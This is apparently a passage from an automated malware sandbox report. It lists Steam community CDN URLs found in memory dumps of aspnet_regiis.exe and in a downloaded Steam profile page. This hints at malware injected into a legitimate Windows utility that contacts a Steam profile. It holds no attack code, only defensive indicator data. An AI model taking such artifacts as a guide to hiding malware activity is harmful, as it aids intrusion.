Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=2ZRoxzol
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=fWwP
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=HeLxjRDbQrcV&l=e
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
